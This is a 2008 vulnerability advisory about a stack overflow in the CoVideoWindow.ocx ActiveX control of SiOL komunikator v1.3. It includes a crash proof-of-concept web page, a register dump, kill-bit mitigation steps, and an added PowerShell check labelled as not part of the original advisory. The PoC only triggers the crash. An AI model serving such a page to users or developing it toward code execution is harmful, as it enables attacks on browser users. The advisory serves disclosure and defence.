siol-overflow.txt

Reported by Edi Strosar, 29 Jul 2008. Source: packetstormsecurity.com (packetstorm).

SiOL komunikator ActiveX stack overflow, allowing remote code execution on SiOL komunikator v1.3 (SLO_71130).


=========================================================================  
  
SiOL komunikator IM ActiveX stack overflow condition  
  
=========================================================================  
  
Release date: 30.7.2008  
Severity: Moderately critical  
Impact: Stack overflow  
Remote: Yes  
Status: Unpatched  
Software: SiOL Komunikator v1.3 (SLO_71130)  
Tested on: Microsoft Windows XP SP3 / IE6 SP3  
Developer: http://www.siol.net/  
http://www.eyeball.com/  
Disclosed by: Edi Strosar  
  
  
Vendor's description of affected application:  
=============================================  
"SiOL komunikator is instant messaging software that supports comprehensive communication with text messages, file exchange, and the option of voice and video calls, without a telephone set and from any location where an Internet connection is available."  
  
English translation (sort of):  
SiOL komunikator is an instant messaging (IM) application based on Eyeball Communicator offered by SiOL (Slovenia On-Line) ISP.  
  
Download link:  
http://www.siol.net/spletne_storitve/siol_komunikator.aspx  
  
  
ActiveX control overview:  
=========================  
Developer: Eyeball Networks, Inc.  
Version: 5.0.907.1  
Component: CoVideoWindow.ocx  
GUID: {CA06EE71-7348-44C4-9540-AAF0E6BD1515}  
RegKey Safe for Script: False  
RegKey Safe for Init: False  
Implements IObjectSafety: True  
KillBitSet: False  
  
  
Description:  
============  
SiOL komunikator's ActiveX component CoVideoWindow.ocx is susceptible to a stack overflow condition in its BgColor() method, which may lead to remote code execution. The vulnerability could be exploited if a user with SiOL komunikator installed visits a specially crafted web page.  
  
  
Proof of concept:  
=================  
The following test case will crash Internet Explorer:  
  
<html>  
<object classid='clsid:CA06EE71-7348-44c4-9540-AAF0E6BD1515' id='test'></object>  
<input language=VBScript onclick=buffero() type=button value="Crash">  
<script language = 'vbscript'>  
Sub buffero()  
  
crash = String(515000, unescape("%41"))  
test.BgColor = crash  
End Sub  
  
</script>  
</html>  
  
Note: close all Internet Explorer instances before executing PoC!  
  
Tested with SiOL komunikator v1.3 (SLO_71130). Other versions may be affected.  
  
  
Exception overview:  
===================  
----------------------------------------------------------------  
Exception C00000FD (STACK_OVERFLOW)  
----------------------------------------------------------------  
EAX=00000774: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  
EBX=00000003: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  
ECX=000428F4: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  
EDX=000FB770: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  
ESP=0013D8EC: C6 9A 80 7C 0D B9 E8 01-00 00 00 00 20 39 EC 01  
EBP=0013D904: 44 D9 13 00 1C 9F E8 01-1C D9 13 00 24 00 39 02  
ESI=000FB772: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  
EDI=02390024: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  
EIP=01E93635: 85 01 3D 00 10 00 00 73-EC 2B C8 8B C4 85 01 8B  
--> TEST [ECX],EAX  
----------------------------------------------------------------  
  
  
Mitigation:  
===========  
Set the kill bit (http://support.microsoft.com/kb/240797).  
  
Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.  
  
Windows Registry Editor Version 5.00  
  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CA06EE71-7348-44c4-9540-AAF0E6BD1515}]  
"Compatibility Flags"=dword:00000400  
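As an added defender-side check (not part of the advisory), the PowerShell below reports whether the kill bit written by the .reg file above is actually set for the control's CLSID, alongside its safe-for-scripting / safe-for-initializing category registration, and can apply the bit without clobbering other compatibility flags. Because the control implements IObjectSafety (see the overview above), it can declare itself safe at runtime regardless of those category keys, which is why the kill bit is the setting worth verifying. The category GUIDs are Microsoft's standard component categories; the 32-bit registry view and an elevated session for the Set function are assumptions noted in the comments.

```powershell
# Added example (not part of the advisory): audit and, if needed, apply the
# kill bit for the CoVideoWindow.ocx CLSID named above. Assumes a 32-bit
# Windows install (on 64-bit hosts 32-bit controls also live under
# Wow6432Node) and an elevated PowerShell session for the Set function.
$Clsid = '{CA06EE71-7348-44C4-9540-AAF0E6BD1515}'

# Component categories a control registers to claim "safe for scripting" /
# "safe for initializing" (the two "RegKey Safe for ..." rows in the advisory).
$CatSafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$CatSafeForInit      = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
$KillBit             = 0x400   # the value the advisory's .reg file writes

function Get-CompatKey([string]$Clsid) {
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Get-ActiveXKillBitState {
    param([Parameter(Mandatory)][string]$Clsid)
    $compatKey = Get-CompatKey $Clsid
    $flags = (Get-ItemProperty -Path $compatKey -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { $flags = 0 }
    $clsidKey = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    [pscustomobject]@{
        Clsid               = $Clsid
        Registered          = (Test-Path $clsidKey)
        InprocServer32      = (Get-ItemProperty -Path "$clsidKey\InprocServer32" `
                               -ErrorAction SilentlyContinue).'(default)'
        RegKeySafeForScript = (Test-Path "$clsidKey\Implemented Categories\$CatSafeForScripting")
        RegKeySafeForInit   = (Test-Path "$clsidKey\Implemented Categories\$CatSafeForInit")
        CompatibilityFlags  = ('0x{0:X8}' -f $flags)
        KillBitSet          = (($flags -band $KillBit) -ne 0)
    }
}

function Set-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$Clsid)
    $compatKey = Get-CompatKey $Clsid
    if (-not (Test-Path $compatKey)) { New-Item -Path $compatKey -Force | Out-Null }
    $current = (Get-ItemProperty -Path $compatKey -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    # OR the kill bit in so any other compatibility flags already set survive
    Set-ItemProperty -Path $compatKey -Name 'Compatibility Flags' `
        -Value ($current -bor $KillBit) -Type DWord
}

Get-ActiveXKillBitState -Clsid $Clsid | Format-List
# Set-ActiveXKillBit -Clsid $Clsid   # run elevated, then re-run the check above
```

KillBitSet should read True after the .reg file (or Set-ActiveXKillBit) has been applied; Internet Explorer instances must be restarted for the change to take effect.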
  
  
Timeline:  
=========  
12.07.2008 - initial developer notification  
- no response  
20.07.2008 - additional developer notification  
- no response  
30.07.2008 - public disclosure  
  
  
Contact:  
========  
edi [dot] strosar [at] gmail [dot] com  
  
  
Disclaimer:  
===========  
The content of this report is purely informational and meant for educational purposes only. Author shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. Any use of information in this advisory is entirely at user's own risk.  
  
=========================================================================
